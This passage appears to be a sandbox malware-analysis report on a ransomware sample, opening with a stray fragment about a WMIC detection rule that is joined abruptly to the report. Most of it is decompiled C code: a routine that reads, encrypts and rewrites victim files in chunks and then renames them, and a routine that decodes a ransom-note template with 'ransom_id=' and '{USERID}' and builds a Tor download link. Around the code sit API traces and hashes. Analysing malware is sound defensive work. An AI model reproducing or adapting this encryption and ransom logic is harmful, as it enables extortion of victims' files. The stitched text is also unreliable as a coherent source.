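        print(f"event {idx}: {rule} (parent {parent})")
```

The `wmic_process_call_create` rule is noisier than the other two in environments where administrators script through WMIC; pairing it with the parent image, or with a `runas`-initiated consent prompt followed by up to a hundred retries as in the loop above, narrows it to the behaviour this sample shows.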

                                        APIs
                                          • Part of subcall function 0F9D3B20: _memset.LIBCMT ref: 0F9D3B72
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F9D3B96
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F9D3B9A
                                          • Part of subcall function 0F9D3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F9D3B9E
                                          • Part of subcall function 0F9D3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F9D3BC5
                                          • Part of subcall function 0F9D3AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0F9D3AD0
                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0F9D3C8D
                                        • wsprintfW.USER32 ref: 0F9D3D57
                                        • VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0F9D3D6B
                                        • GetForegroundWindow.USER32 ref: 0F9D3D80
                                        • ShellExecuteExW.SHELL32(00000000), ref: 0F9D3DE1
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D3DF4
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0F9D3E06
                                        • CloseHandle.KERNEL32(?), ref: 0F9D3E0F
                                        • ExitProcess.KERNEL32 ref: 0F9D3E17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
                                        • String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
                                        • API String ID: 561366689-3790645798
                                        • Opcode ID: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction ID: 1b1e8f97a290841dd6f123cdafe7add18df6feed863d5dc5ad129d7878d62b33
                                        • Opcode Fuzzy Hash: d8e225287907bf6ae8012f636f202ae0bb6613253845a7b9d040c87cb1b71f12
                                        • Instruction Fuzzy Hash: DB516CB0008341DFE3208F51D448B5ABFF9FF84759F104A1DE59886292C7FA91A8CF96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 78%
                                        			E0F9D35E0(WCHAR* __ecx, void* __edx, void* __eflags) {
                                        				long _v8;
                                        				void* _v12;
                                        				long _v16;
                                        				long _v20;
                                        				void* _v24;
                                        				void* _v28;
                                        				long _v32;
                                        				long _v36;
                                        				void _v40;
                                        				void _v44;
                                        				signed int _v48;
                                        				WCHAR* _v52;
                                        				WCHAR* _v56;
                                        				void* _v60;
                                        				void* _v64;
                                        				void* _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				short _v80;
                                        				int _v84;
                                        				char _v88;
                                        				char _v104;
                                        				char _v108;
                                        				char _v140;
                                        				char _v388;
                                        				void* _t96;
                                        				void* _t97;
                                        				struct HWND__* _t99;
                                        				void* _t101;
                                        				void* _t107;
                                        				long _t124;
                                        				long _t125;
                                        				long _t128;
                                        				WCHAR* _t145;
                                        				void* _t147;
                                        				void* _t149;
                                        				void* _t151;
                                        				WCHAR* _t162;
                                        				void* _t163;
                                        				void* _t164;
                                        				void _t165;
                                        				void* _t166;
                                        				long _t168;
                                        				void* _t173;
                                        				void* _t175;
                                        				void* _t176;
                                        				void* _t177;
                                        
                                        				_t145 = __ecx;
                                        				_t166 = __edx;
                                        				_v52 = __ecx;
                                        				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
                                        				_v20 = 0;
                                        				_v32 = 0;
                                        				_t151 = _t166;
                                        				E0F9D63D0(_t151, 0, 0,  &_v20,  &_v32);
                                        				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
                                        				_v80 = 0x47002e;
                                        				_v56 = _t162;
                                        				_v76 = 0x430044;
                                        				_v72 = 0x42;
                                        				lstrcpyW(_t162, _t145);
                                        				lstrcatW(_t162,  &_v80);
                                        				asm("movdqa xmm0, [0xf9e04b0]");
                                        				asm("movdqu [ebp-0x88], xmm0");
                                        				_push(_t151);
                                        				asm("movdqa xmm0, [0xf9e04b0]");
                                        				asm("movdqu [ebp-0x78], xmm0");
                                        				_v108 = 0;
                                        				asm("movdqa xmm0, [0xf9e04b0]");
                                        				asm("movdqu [ebp-0x64], xmm0");
                                        				E0F9D82A0( &_v104, 0x10);
                                        				E0F9D82A0( &_v140, 0x20);
                                        				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                        				asm("movdqu xmm0, [ebp-0x88]");
                                        				asm("movdqu [ebx], xmm0");
                                        				asm("movdqu xmm0, [ebp-0x78]");
                                        				_v24 = _t96;
                                        				asm("movdqu [ebx+0x10], xmm0");
                                        				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
                                        				asm("movdqu xmm0, [ebp-0x64]");
                                        				_t163 = _t97;
                                        				_v60 = _t163;
                                        				asm("movdqu [edi], xmm0");
                                        				_v88 = 0x20;
                                        				_v84 = 0x10;
                                        				_t99 = E0F9D6530(_v20, _v32, _t96,  &_v88, 0x800);
                                        				_t175 = _t173 + 0x18;
                                        				if(_t99 != 0) {
                                        					_t101 = E0F9D6530(_v20, _v32, _t163,  &_v84, 0x800);
                                        					_t176 = _t175 + 0x14;
                                        					if(_t101 != 0) {
                                        						E0F9D83C0( &_v140,  &_v388);
                                        						_t177 = _t176 + 8;
                                        						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
                                        						_v28 = _t147;
                                        						if(_t147 != 0xffffffff) {
                                        							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
                                        							 *_t164 = 0;
                                        							 *(_t164 + 4) = 0;
                                        							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
                                        							_t168 = 0;
                                        							_v12 = _t107;
                                        							_v36 = 0;
                                        							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
                                        								_t124 = _v8;
                                        								if(_t124 != 0) {
                                        									_t149 = 0;
                                        									_v64 = 0;
                                        									_t168 =  <  ? 1 : _t168;
                                        									 *_t164 =  *_t164 + _t124;
                                        									asm("adc [edi+0x4], ebx");
                                        									_t125 = _v8;
                                        									_v48 = _t125;
                                        									if((_t125 & 0x0000000f) != 0) {
                                        										do {
                                        											_t125 = _t125 + 1;
                                        										} while ((_t125 & 0x0000000f) != 0);
                                        										_v8 = _t125;
                                        									}
                                        									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
                                        									E0F9D89C0(_t126, _v12, _v48);
                                        									_t128 = _v8;
                                        									_t177 = _t177 + 0xc;
                                        									_v40 = _t128;
                                        									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
                                        										E0F9D3500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
                                        										_t149 = _v64;
                                        										_t177 = _t177 + 0x10;
                                        									}
                                        									VirtualFree(_v68, 0, 0x8000);
                                        									SetFilePointer(_v28,  ~_v48, 0, 1);
                                        									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
                                        										_t168 = 1;
                                        										_v36 = 1;
                                        									}
                                        									VirtualFree(_t149, 0, 0x8000);
                                        									_t147 = _v28;
                                        									if(_t168 == 0) {
                                        										_t107 = _v12;
                                        										continue;
                                        									}
                                        								}
                                        								break;
                                        							}
                                        							VirtualFree(_v12, 0, 0x8000);
                                        							if(_v36 == 0) {
                                        								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
                                        								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
                                        								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
                                        							}
                                        							CloseHandle(_t147);
                                        							_v40 =  *_t164;
                                        							VirtualFree(_t164, 0, 0x8000);
                                        							VirtualFree(_v24, 0, 0x8000);
                                        							VirtualFree(_v60, 0, 0x8000);
                                        							if(_v36 == 0) {
                                        								MoveFileW(_v52, _v56);
                                        							}
                                        							_t165 = _v40;
                                        						} else {
                                        							VirtualFree(_t163, 0, 0x8000);
                                        							VirtualFree(_v24, 0, 0x8000);
                                        							asm("xorps xmm0, xmm0");
                                        							asm("movlpd [ebp-0x28], xmm0");
                                        							_t165 = _v44;
                                        						}
                                        					} else {
                                        						GetLastError();
                                        						asm("xorps xmm0, xmm0");
                                        						asm("movlpd [ebp-0x28], xmm0");
                                        						_t165 = _v44;
                                        					}
                                        				} else {
                                        					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
                                        					asm("xorps xmm0, xmm0");
                                        					asm("movlpd [ebp-0x28], xmm0");
                                        					_t165 = _v44;
                                        				}
                                        				VirtualFree(_v56, 0, 0x8000);
                                        				return _t165;
                                        			}

                                        APIs
                                        • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F9D35F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F9D35FF
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F9D363A
                                        • lstrcpyW.KERNEL32 ref: 0F9D3658
                                        • lstrcatW.KERNEL32(00000000,0047002E), ref: 0F9D3663
                                          • Part of subcall function 0F9D82A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                          • Part of subcall function 0F9D82A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                          • Part of subcall function 0F9D82A0: GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                          • Part of subcall function 0F9D82A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                          • Part of subcall function 0F9D82A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36C6
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36F1
                                          • Part of subcall function 0F9D6530: EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                          • Part of subcall function 0F9D6530: GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • MessageBoxA.USER32 ref: 0F9D3738
                                        • GetLastError.KERNEL32 ref: 0F9D3773
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D39E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                        • String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
                                        • API String ID: 1177701972-69869980
                                        • Opcode ID: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction ID: 737e6f7a10b0b45555cb555ef9b09ef4ccc2331dd80173a5a9ed17db930fa17b
                                        • Opcode Fuzzy Hash: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction Fuzzy Hash: F2C18E71E40318BBEB218B90DC46FEEBBB8BF48711F208115F640BA1C2DBB869548B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 49%
                                        			E0F9D40E0(void* __ecx, void* __edx) {
                                        				char _v148;
                                        				char _v152;
                                        				WCHAR* _v156;
                                        				void* _v160;
                                        				intOrPtr _v168;
                                        				intOrPtr _v172;
                                        				intOrPtr _v176;
                                        				intOrPtr _v180;
                                        				intOrPtr _v184;
                                        				intOrPtr _v188;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				intOrPtr _v200;
                                        				intOrPtr _v204;
                                        				intOrPtr _v208;
                                        				intOrPtr _v212;
                                        				intOrPtr _v216;
                                        				intOrPtr _v220;
                                        				intOrPtr _v224;
                                        				intOrPtr _v228;
                                        				intOrPtr _v232;
                                        				char _v236;
                                        				intOrPtr _v240;
                                        				void* _v244;
                                        				intOrPtr _v248;
                                        				intOrPtr _v252;
                                        				intOrPtr _v256;
                                        				intOrPtr _v260;
                                        				intOrPtr _v264;
                                        				intOrPtr _v268;
                                        				intOrPtr _v272;
                                        				intOrPtr _v276;
                                        				char _v280;
                                        				void* _t54;
                                        				void* _t58;
                                        				void* _t60;
                                        				signed int _t61;
                                        				void* _t62;
                                        				WCHAR* _t65;
                                        				signed short _t69;
                                        				signed short* _t70;
                                        				WCHAR* _t77;
                                        				signed int _t82;
                                        				signed int _t83;
                                        				void* _t87;
                                        				void* _t90;
                                        				long _t93;
                                        				WCHAR* _t94;
                                        				signed int _t97;
                                        				void* _t98;
                                        				WCHAR* _t100;
                                        				void* _t102;
                                        
                                        				if( *0xf9e2a64 != 0) {
                                        					L24:
                                        					return _t54;
                                        				}
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				E0F9D39F0( &_v148);
                                        				E0F9D7330( &_v236, __edx);
                                        				_t97 = E0F9D7140( &_v236);
                                        				_t93 = 0x42 + _t97 * 2;
                                        				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
                                        				_v244 = _t58;
                                        				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
                                        					_t98 = 0;
                                        				} else {
                                        					_t98 = _t58;
                                        				}
                                        				E0F9D6F40( &_v152, _t98);
                                        				_t60 = E0F9D8090(_t98, L"ransom_id=");
                                        				_t61 = lstrlenW(L"ransom_id=");
                                        				asm("movdqa xmm1, [0xf9e04a0]");
                                        				_t77 = 0xf9e2000;
                                        				_t87 = 0xa3;
                                        				_t100 = _t60 + _t61 * 2;
                                        				_t62 = 0xa30;
                                        				_v160 = _t100;
                                        				do {
                                        					_t13 =  &(_t77[8]); // 0x44004e
                                        					_t77 = _t13;
                                        					asm("movdqu xmm0, [ecx-0x10]");
                                        					asm("pxor xmm0, xmm1");
                                        					asm("movdqu [ecx-0x10], xmm0");
                                        					_t87 = _t87 - 1;
                                        				} while (_t87 != 0);
                                        				do {
                                        					 *(_t62 + 0xf9e2000) =  *(_t62 + 0xf9e2000) ^ 0x00000005;
                                        					_t62 = _t62 + 1;
                                        				} while (_t62 < 0xa38);
                                        				 *0xf9e2a64 = 0xf9e2000;
                                        				_t94 = E0F9D8090(0xf9e2000, L"{USERID}");
                                        				if(_t94 == 0) {
                                        					L20:
                                        					_v280 = 0x740068;
                                        					_v276 = 0x700074;
                                        					_v272 = 0x3a0073;
                                        					_v268 = 0x2f002f;
                                        					_v264 = 0x770077;
                                        					_v260 = 0x2e0077;
                                        					_v256 = 0x6f0074;
                                        					_v252 = 0x700072;
                                        					_v248 = 0x6f0072;
                                        					_v244 = 0x65006a;
                                        					_v240 = 0x740063;
                                        					_v236 = 0x6f002e;
                                        					_v232 = 0x670072;
                                        					_v228 = 0x64002f;
                                        					_v224 = 0x77006f;
                                        					_v220 = 0x6c006e;
                                        					_v216 = 0x61006f;
                                        					_v212 = 0x2f0064;
                                        					_v208 = 0x6f0064;
                                        					_v204 = 0x6e0077;
                                        					_v200 = 0x6f006c;
                                        					_v196 = 0x640061;
                                        					_v192 = 0x65002d;
                                        					_v188 = 0x730061;
                                        					_v184 = 0x2e0079;
                                        					_v180 = 0x740068;
                                        					_v176 = 0x6c006d;
                                        					_v172 = 0x65002e;
                                        					_v168 = 0x6e;
                                        					if( *0xf9e2a44 == 0) {
                                        						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        						 *0xf9e2a44 = _t65;
                                        						if(_t65 != 0) {
                                        							wsprintfW(_t65, L"%s",  &_v280);
                                        						}
                                        					}
                                        					VirtualFree(_v160, 0, 0x8000);
                                        					_t54 = E0F9D7C10( &_v152);
                                        					goto L24;
                                        				}
                                        				while(1) {
                                        					L11:
                                        					lstrcpyW(_t94, _t100);
                                        					_t94[lstrlenW(_t94)] = 0x20;
                                        					_t94 = 0xf9e2000;
                                        					_t69 =  *0xf9e2000; // 0xfeff
                                        					if(_t69 == 0) {
                                        						goto L20;
                                        					}
                                        					_t82 = _t69 & 0x0000ffff;
                                        					_t102 = 0xf9e2000 - L"{USERID}";
                                        					do {
                                        						_t70 = L"{USERID}";
                                        						if(_t82 == 0) {
                                        							goto L19;
                                        						}
                                        						while(1) {
                                        							_t83 =  *_t70 & 0x0000ffff;
                                        							if(_t83 == 0) {
                                        								break;
                                        							}
                                        							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
                                        							if(_t90 != 0) {
                                        								L18:
                                        								if( *_t70 == 0) {
                                        									break;
                                        								}
                                        								goto L19;
                                        							}
                                        							_t70 =  &(_t70[1]);
                                        							if( *(_t102 + _t70) != _t90) {
                                        								continue;
                                        							}
                                        							goto L18;
                                        						}
                                        						_t100 = _v156;
                                        						goto L11;
                                        						L19:
                                        						_t20 =  &(_t94[1]); // 0x2d002d
                                        						_t82 =  *_t20 & 0x0000ffff;
                                        						_t94 =  &(_t94[1]);
                                        						_t102 = _t102 + 2;
                                        					} while (_t82 != 0);
                                        					goto L20;
                                        				}
                                        				goto L20;
                                        			}
                                        0x0f9d40f5
                                        0x0f9d43c8
                                        0x0f9d43cd
                                        0x0f9d43cd
                                        0x0f9d40fb
                                        0x0f9d40fc
                                        0x0f9d40fe
                                        0x0f9d40ff
                                        0x0f9d4104
                                        0x0f9d4106
                                        0x0f9d4107
                                        0x0f9d4109
                                        0x0f9d410a
                                        0x0f9d410c
                                        0x0f9d410d
                                        0x0f9d410f
                                        0x0f9d4110
                                        0x0f9d4115
                                        0x0f9d4117
                                        0x0f9d4118
                                        0x0f9d4121
                                        0x0f9d412d
                                        0x0f9d413e
                                        0x0f9d4147
                                        0x0f9d4151
                                        0x0f9d4157
                                        0x0f9d4160
                                        0x0f9d4171
                                        0x0f9d416d
                                        0x0f9d416d
                                        0x0f9d416d
                                        0x0f9d417b
                                        0x0f9d4187
                                        0x0f9d4193
                                        0x0f9d4199
                                        0x0f9d41a1
                                        0x0f9d41a6
                                        0x0f9d41ab
                                        0x0f9d41ae
                                        0x0f9d41b3
                                        0x0f9d41c0
                                        0x0f9d41c0
                                        0x0f9d41c0
                                        0x0f9d41c3
                                        0x0f9d41c8
                                        0x0f9d41cc
                                        0x0f9d41d1
                                        0x0f9d41d1
                                        0x0f9d41e0
                                        0x0f9d41e0
                                        0x0f9d41e7
                                        0x0f9d41e8
                                        0x0f9d41f4
                                        0x0f9d4208
                                        0x0f9d420c
                                        0x0f9d4286
                                        0x0f9d428d
                                        0x0f9d4295
                                        0x0f9d429d
                                        0x0f9d42a5
                                        0x0f9d42ad
                                        0x0f9d42b5
                                        0x0f9d42bd
                                        0x0f9d42c5
                                        0x0f9d42cd
                                        0x0f9d42d5
                                        0x0f9d42dd
                                        0x0f9d42e5
                                        0x0f9d42ed
                                        0x0f9d42f5
                                        0x0f9d42fd
                                        0x0f9d4305
                                        0x0f9d430d
                                        0x0f9d4315
                                        0x0f9d431d
                                        0x0f9d4325
                                        0x0f9d432d
                                        0x0f9d4335
                                        0x0f9d433d
                                        0x0f9d4345
                                        0x0f9d434d
                                        0x0f9d4355
                                        0x0f9d435d
                                        0x0f9d4365
                                        0x0f9d436d
                                        0x0f9d4375
                                        0x0f9d4385
                                        0x0f9d438b
                                        0x0f9d4392
                                        0x0f9d439f
                                        0x0f9d43a5
                                        0x0f9d4392
                                        0x0f9d43b6
                                        0x0f9d43c3
                                        0x00000000
                                        0x0f9d43c3
                                        0x0f9d4210
                                        0x0f9d4210
                                        0x0f9d4212
                                        0x0f9d4224
                                        0x0f9d4228
                                        0x0f9d422d
                                        0x0f9d4236
                                        0x00000000
                                        0x00000000
                                        0x0f9d423a
                                        0x0f9d423d
                                        0x0f9d4243
                                        0x0f9d4243
                                        0x0f9d424b
                                        0x00000000
                                        0x00000000
                                        0x0f9d4250
                                        0x0f9d4250
                                        0x0f9d4256
                                        0x00000000
                                        0x00000000
                                        0x0f9d4260
                                        0x0f9d4262
                                        0x0f9d426d
                                        0x0f9d4271
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d4271
                                        0x0f9d4264
                                        0x0f9d426b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0f9d426b
                                        0x0f9d43ce
                                        0x00000000
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d4277
                                        0x0f9d427b
                                        0x0f9d427e
                                        0x0f9d4281
                                        0x00000000
                                        0x0f9d4243
                                        0x00000000

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4151
                                        • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4193
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4100118565-2385900546
                                        • Opcode ID: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction ID: c7647e25ff9f3e2b9cd667db2ca99cf6af73a741ddd84f731f6c9557aa171e64
                                        • Opcode Fuzzy Hash: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction Fuzzy Hash: FB71E270508340DBE730DF14C909B6ABBEAFB80759F60891CF6855B2D2DBF99548CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
